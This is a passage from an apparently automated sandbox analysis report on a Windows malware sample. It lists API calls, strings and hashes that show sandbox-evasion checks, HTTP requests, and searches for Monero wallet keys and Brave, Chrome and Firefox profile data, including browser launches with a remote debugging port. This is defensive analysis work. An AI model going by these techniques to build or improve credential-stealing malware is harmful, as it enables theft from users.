                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01318B98,?,00A510F4,?,00000000,?,00A510F8,?,00000000,00A50AF3), ref: 00A46D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A46D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00A46D99
                                      • Sleep.KERNEL32(00001770), ref: 00A46DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01318B98,?,00A510F4,?,00000000,?,00A510F8,?,00000000,00A50AF3), ref: 00A46DBA
                                      • ExitProcess.KERNEL32 ref: 00A46DC2
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: 0629eefc00f4092eca3211abd705360b2676bd0bda5f1e0500092879cd2a6b93
                                      • Instruction ID: 8562fe2480e49c6a8278581fa532db610ac31ce8b014b0f9659570d17a90b7ce
                                      • Opcode Fuzzy Hash: 0629eefc00f4092eca3211abd705360b2676bd0bda5f1e0500092879cd2a6b93
                                      • Instruction Fuzzy Hash: 48313C79E44604ABDB44FBF0DE56BFE7379AF94340F000928F112A61D2DF706905C662

                                      Control-flow Graph
                                      Basic blocks and edges:
                                      • a31220-a31247: call a48b40, GlobalMemoryStatusEx -> a31273-a3127a, a31249-a31271
                                      • a31249-a31271: call a4dd30 (x2) -> a31281-a31285
                                      • a31273-a3127a -> a31281-a31285
                                      • a31281-a31285 -> a31287, a3129a-a3129d
                                      • a31287 -> a31292-a31294, a31289-a31290
                                      • a31289-a31290 -> a3129a-a3129d, a31292-a31294
                                      • a31292-a31294: ExitProcess
                                      • a3129a-a3129d
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A3123E
                                      • __aulldiv.LIBCMT ref: 00A31258
                                      • __aulldiv.LIBCMT ref: 00A31266
                                      • ExitProcess.KERNEL32 ref: 00A31294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: 142c040cfe3e76c424d12486e4f48b98c93e872b1427b01c6a3b4d7cb42ccaf7
                                      • Instruction ID: ca5956be080d7098fc6ec44b2709f1a68cc003ce8a5f2d796316e9a36d67f31a
                                      • Opcode Fuzzy Hash: 142c040cfe3e76c424d12486e4f48b98c93e872b1427b01c6a3b4d7cb42ccaf7
                                      • Instruction Fuzzy Hash: C6011DB0D44308BAEB10EFE4DD4ABEEBB78AB54705F208458F604BA2C1D67455458769

                                      Control-flow Graph
                                      Basic blocks and edges:
                                      • a46d93 -> a46daa
                                      • a46daa -> a46dac-a46dc2, a46d5a-a46d77
                                      • a46d5a-a46d77: call a4ade0, OpenEventA -> a46d95-a46da4, a46d79-a46d91
                                      • a46d79-a46d91: call a4ade0, CreateEventA -> a46dac-a46dc2
                                      • a46d95-a46da4: CloseHandle, Sleep -> a46daa
                                      • a46dac-a46dc2: call a46bc0, call a45d60, CloseHandle, ExitProcess
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01318B98,?,00A510F4,?,00000000,?,00A510F8,?,00000000,00A50AF3), ref: 00A46D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A46D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00A46D99
                                      • Sleep.KERNEL32(00001770), ref: 00A46DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01318B98,?,00A510F4,?,00000000,?,00A510F8,?,00000000,00A50AF3), ref: 00A46DBA
                                      • ExitProcess.KERNEL32 ref: 00A46DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 2a146b01a399524966b43bd10b359021c86dda0ab76f82d7bff8a390183249ec
                                      • Instruction ID: 2ae17425fd4366c5ebc055d618a363c3f165d5d9847795c8a6138e97e7ed8e3c
                                      • Opcode Fuzzy Hash: 2a146b01a399524966b43bd10b359021c86dda0ab76f82d7bff8a390183249ec
                                      • Instruction Fuzzy Hash: B5F05E78E88B09ABEB40ABA0DD0ABBE3774AF95701F100519B516A92D1CBF06500CA67

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A34889
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00A34899
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: 8372dcbcafa7e8653949f13315e9fffbcaca309092e3eb65457c4aa8188d2805
                                      • Instruction ID: c786a81388fba12dace2be09f7d1c9884a89f72c256ff84e2b4a99fb50129ef5
                                      • Opcode Fuzzy Hash: 8372dcbcafa7e8653949f13315e9fffbcaca309092e3eb65457c4aa8188d2805
                                      • Instruction Fuzzy Hash: E62150B1D00208ABDF14DFA4ED4ABDE7B74FB44350F108625F515A72C0DB706A09CB91

                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A362D0: InternetOpenA.WININET(00A50DFF,00000001,00000000,00000000,00000000), ref: 00A36331
                                        • Part of subcall function 00A362D0: StrCmpCA.SHLWAPI(?,0131F410), ref: 00A36353
                                        • Part of subcall function 00A362D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A36385
                                        • Part of subcall function 00A362D0: HttpOpenRequestA.WININET(00000000,GET,?,0131EE20,00000000,00000000,00400100,00000000), ref: 00A363D5
                                        • Part of subcall function 00A362D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A3640F
                                        • Part of subcall function 00A362D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A36421
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A45478
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: 2c7e5c64d6c9a3e52a6c9148ded81a82cd9927465eb64b4b12b80d37d67ed3d0
                                      • Instruction ID: b18d32312d9cdbc85a926f6fd0048d73f867dc503005cc0b923f054ddf25721f
                                      • Opcode Fuzzy Hash: 2c7e5c64d6c9a3e52a6c9148ded81a82cd9927465eb64b4b12b80d37d67ed3d0
                                      • Instruction Fuzzy Hash: 8B115635D40508ABDB14FFB4DE52AED7379AFA0341F404568F91A5B492EF30AB05C651
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A47AA0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A47AA7
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 00A47ABF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateComputerNameProcess
                                      • String ID:
                                      • API String ID: 1664310425-0
                                      • Opcode ID: f47d230148ab0422b0e7e99db17bc79ee6129ab0423530c7143fac828898cef6
                                      • Instruction ID: 4e440460b20396c631ce58e8c73884ace7525c2a89dcea7085687d858dfef40a
                                      • Opcode Fuzzy Hash: f47d230148ab0422b0e7e99db17bc79ee6129ab0423530c7143fac828898cef6
                                      • Instruction Fuzzy Hash: 660186B1A08349ABC700DF98DD45FAEBBB8F744755F100129F505E6380D7745A0087A1
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A3112B
                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00A31132
                                      • ExitProcess.KERNEL32 ref: 00A31143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: ec81478aac0958cbfe8b4411e6b380a552b06a8f158a7311bc697885bdebbfef
                                      • Instruction ID: 4b299d94abd9d9436268be6443fd25a5087b1b1ec19daa0b0a1c38a151aa8fdf
                                      • Opcode Fuzzy Hash: ec81478aac0958cbfe8b4411e6b380a552b06a8f158a7311bc697885bdebbfef
                                      • Instruction Fuzzy Hash: A8E0E670E49308FBE7106BA19D0AB4D76789B04B15F100155F70DBA2D0C6B53540566D
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00A310B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00A310F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: d9a8f44535adaa829145038a2aec4d6679cdf2cc1a5eff38a3d238950b51e12f
                                      • Instruction ID: 671b1ee983cc3362c9567c46aab636f0839a45835caa46ef238b27de9097cf8b
                                      • Opcode Fuzzy Hash: d9a8f44535adaa829145038a2aec4d6679cdf2cc1a5eff38a3d238950b51e12f
                                      • Instruction Fuzzy Hash: 5DF082B1641318BBE7189BB4AC59FAEB7A8E705B05F300448F504EB280D571AE00DAA4
                                      APIs
                                        • Part of subcall function 00A47A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A47AA0
                                        • Part of subcall function 00A47A70: RtlAllocateHeap.NTDLL(00000000), ref: 00A47AA7
                                        • Part of subcall function 00A47A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00A47ABF
                                        • Part of subcall function 00A479E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A311B7), ref: 00A47A10
                                        • Part of subcall function 00A479E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A47A17
                                        • Part of subcall function 00A479E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A47A2F
                                      • ExitProcess.KERNEL32 ref: 00A311C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 3550813701-0
                                      • Opcode ID: afcd253a257e0d8c64392dbc8e4bac698aa2d069fa603671bf97b8208dc05ba4
                                      • Instruction ID: e1189a319bb9ef8a6201e4e86d6ac0f129c28b13a02a852f20255a8784840d0f
                                      • Opcode Fuzzy Hash: afcd253a257e0d8c64392dbc8e4bac698aa2d069fa603671bf97b8208dc05ba4
                                      • Instruction Fuzzy Hash: 5CE012B9D0430197DA1073B57D07B5F329C9B5474AF000918FA08C6242EE25F8524175
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00A50B32,00A50B2F,00000000,?,?,?,00A51450,00A50B2E), ref: 00A3BEC5
                                      • StrCmpCA.SHLWAPI(?,00A51454), ref: 00A3BF33
                                      • StrCmpCA.SHLWAPI(?,00A51458), ref: 00A3BF49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A3C8A9
                                      • FindClose.KERNEL32(000000FF), ref: 00A3C8BB
                                      Strings
                                      • Brave, xrefs: 00A3C0E8
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00A3C495
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00A3C3B2
                                      • Preferences, xrefs: 00A3C104
                                      • Google Chrome, xrefs: 00A3C6F8
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00A3C534
                                      • \Brave\Preferences, xrefs: 00A3C1C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-1869280968
                                      • Opcode ID: c5dd622b906689fdf26f172db0b3fd64c9577021dae63a92c849f95920ccc8b2
                                      • Instruction ID: ce00ae0ba17cb4e9a8dfc89fee20f561eb92ed0bc21e16b1649c4841bccaca4c
                                      • Opcode Fuzzy Hash: c5dd622b906689fdf26f172db0b3fd64c9577021dae63a92c849f95920ccc8b2
                                      • Instruction Fuzzy Hash: 145297769501089BDB14FB70DE96FEE733DAFA4341F404598B50AA6191EE30AF48CF62
                                      APIs
                                      • wsprintfA.USER32 ref: 00A43B1C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00A43B33
                                      • lstrcat.KERNEL32(?,?), ref: 00A43B85
                                      • StrCmpCA.SHLWAPI(?,00A50F58), ref: 00A43B97
                                      • StrCmpCA.SHLWAPI(?,00A50F5C), ref: 00A43BAD
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A43EB7
                                      • FindClose.KERNEL32(000000FF), ref: 00A43ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-2524465048
                                      • Opcode ID: aa3422831293ce16a8e055268faeee99226233566c26ef05b345385324017dcc
                                      • Instruction ID: db5a24a4001ef3f12b369368ebc3d125b6e88c021f47162d1aec7ea7ede2c5ed
                                      • Opcode Fuzzy Hash: aa3422831293ce16a8e055268faeee99226233566c26ef05b345385324017dcc
                                      • Instruction Fuzzy Hash: 25A12376A00318ABDB24DF64DD85FEE7378BB94701F044588F60D9A181DB75AB88CF61
                                      APIs
                                      • wsprintfA.USER32 ref: 00A44B7C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00A44B93
                                      • StrCmpCA.SHLWAPI(?,00A50FC4), ref: 00A44BC1
                                      • StrCmpCA.SHLWAPI(?,00A50FC8), ref: 00A44BD7
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A44DCD
                                      • FindClose.KERNEL32(000000FF), ref: 00A44DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: 5a3ee8f101f6f88acae4f09871a4ce3c4161d47979d14d92ea913a94eab709ef
                                      • Instruction ID: b992054f1dc8a28fd64f9c45155a6a32a99d6b6874253f410a6f0587c27e9d69
                                      • Opcode Fuzzy Hash: 5a3ee8f101f6f88acae4f09871a4ce3c4161d47979d14d92ea913a94eab709ef
                                      • Instruction Fuzzy Hash: 2A613976904218ABDB24EBA0DD45FEA737CBB48701F008588B50D96141EB71AB88CFA1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A447D0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A447D7
                                      • wsprintfA.USER32 ref: 00A447F6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00A4480D
                                      • StrCmpCA.SHLWAPI(?,00A50FAC), ref: 00A4483B
                                      • StrCmpCA.SHLWAPI(?,00A50FB0), ref: 00A44851
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A448DB
                                      • FindClose.KERNEL32(000000FF), ref: 00A448F0
                                      • lstrcat.KERNEL32(?,0131F450), ref: 00A44915
                                      • lstrcat.KERNEL32(?,0131D9A0), ref: 00A44928
                                      • lstrlen.KERNEL32(?), ref: 00A44935
                                      • lstrlen.KERNEL32(?), ref: 00A44946
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 671575355-2848263008
                                      • Opcode ID: 003be8d88ac451ae0caa79c0d00a477aa09b3bc547d14101390e851d3f2bae8b
                                      • Instruction ID: 861df953acb8c52762156bc974b00fea329a84f7833a250593e6665dd995fbb3
                                      • Opcode Fuzzy Hash: 003be8d88ac451ae0caa79c0d00a477aa09b3bc547d14101390e851d3f2bae8b
                                      • Instruction Fuzzy Hash: 385145B5944318ABDB24EB70DD89FED737CAB58300F404588B64DD6190EB74AB88CFA1
                                      APIs
                                      • wsprintfA.USER32 ref: 00A44113
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00A4412A
                                      • StrCmpCA.SHLWAPI(?,00A50F94), ref: 00A44158
                                      • StrCmpCA.SHLWAPI(?,00A50F98), ref: 00A4416E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A442BC
                                      • FindClose.KERNEL32(000000FF), ref: 00A442D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: b3e3812d0b970159b5339a7511d8366e87070d986c83fbe1d6d68cc8ae360ab4
                                      • Instruction ID: d55d24e948e806a96e96cfe61959022669578fb1b17eea66d2411408a55fb593
                                      • Opcode Fuzzy Hash: b3e3812d0b970159b5339a7511d8366e87070d986c83fbe1d6d68cc8ae360ab4
                                      • Instruction Fuzzy Hash: 4F515CB5904218ABCB24EBB0DD45FEE737CBB98300F0046D8B65D96150DB75AB89CF64
                                      APIs
                                      • wsprintfA.USER32 ref: 00A3EE3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00A3EE55
                                      • StrCmpCA.SHLWAPI(?,00A51630), ref: 00A3EEAB
                                      • StrCmpCA.SHLWAPI(?,00A51634), ref: 00A3EEC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A3F3AE
                                      • FindClose.KERNEL32(000000FF), ref: 00A3F3C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: 60ed9948bb24a99897e6e58fc0b36acdd08073a29c5ceaeff4ff16ae53f0983c
                                      • Instruction ID: 32f036fcbc6234e8a9cd72f765f5f1104e35557ecf0e7b3fcff86dbda3572d45
                                      • Opcode Fuzzy Hash: 60ed9948bb24a99897e6e58fc0b36acdd08073a29c5ceaeff4ff16ae53f0983c
                                      • Instruction Fuzzy Hash: 75E136769511189BEB54FB60CEA2EEE733DAFA4340F4045D9B50A62092EF306F89CF51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                      • API String ID: 0-1562099544
                                      • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction ID: 635c03e170ab6691e1a575a5b4652c5391ed2bd24116a72404132e76579a0e2a
                                      • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction Fuzzy Hash: 22E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A516B0,00A50D97), ref: 00A3F81E
                                      • StrCmpCA.SHLWAPI(?,00A516B4), ref: 00A3F86F
                                      • StrCmpCA.SHLWAPI(?,00A516B8), ref: 00A3F885
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A3FBB1
                                      • FindClose.KERNEL32(000000FF), ref: 00A3FBC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: 5ae2d09c816e28ba8ce062bd30e0782330619b2f7e594e4e98c2e66247f60b8b
                                      • Instruction ID: 3319d6e2d623eb1626cdca1520b382776b8108c990e03e71ff8fb20d4abc570e
                                      • Opcode Fuzzy Hash: 5ae2d09c816e28ba8ce062bd30e0782330619b2f7e594e4e98c2e66247f60b8b
                                      • Instruction Fuzzy Hash: 41B163769502189FDB24FF60DE92FEE7379AFA4340F0045A8B50A56191EF306F49CB92
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A5523C,?,?,?,00A552E4,?,?,00000000,?,00000000), ref: 00A31963
                                      • StrCmpCA.SHLWAPI(?,00A5538C), ref: 00A319B3
                                      • StrCmpCA.SHLWAPI(?,00A55434), ref: 00A319C9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A31D80
                                      • DeleteFileA.KERNEL32(00000000), ref: 00A31E0A
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A31E60
